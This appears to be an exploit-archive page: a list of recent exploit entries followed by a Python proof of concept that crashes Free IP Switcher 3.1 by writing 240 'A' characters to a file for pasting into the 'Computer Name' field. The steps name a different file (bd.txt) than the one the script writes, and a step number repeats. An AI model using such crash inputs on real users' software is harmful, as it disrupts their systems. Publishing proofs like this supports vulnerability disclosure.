
9 changes to exploits/shellcodes ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (DoS) ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC) AirMore 1.6.1 - Denial of Service (PoC) Free IP Switcher 3.1 - 'Computer Name' Denial of Service (PoC) Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC) VSCO 1.1.1.0 - Denial of Service (PoC) Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference Webiness Inventory 2.3 - SQL Injection Webiness Inventory 2.3 - 'order' SQL Injection MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery Jinja2 2.10 - 'from_string' Server Side Template Injection qdPM 9.1 - 'search_by_extrafields[]' SQL Injection UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload
22 lines
No EOL
712 B
Python
Executable file
22 lines
No EOL
712 B
Python
Executable file
#Exploit Title: Free IP Switcher 3.1 - Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2018-02-14
|
|
#Vendor Homepage: http://www.eusing.com/index.html
|
|
#Software Link: http://www.eusing.com/ipscan/free_ip_scanner.htm
|
|
#Tested Version: 3.1
|
|
#Tested on: Windows 10 Single Language x64 / Windows 7 x32 Service Pack 1
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: Free_IP_Switcher_3.1.py
|
|
#2.- Open bd.txt and copy content to clipboard
|
|
#2.- Open Free IP Switcher
|
|
#3.- Select "Network Adapter"
|
|
#4.- In "Additional" enable "Computer Name" and Paste ClipBoard
|
|
#5.- Click on "Activate"
|
|
#6.- Crashed
|
|
|
|
cod = "\x41" * 240
|
|
|
|
f = open('ip_code.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |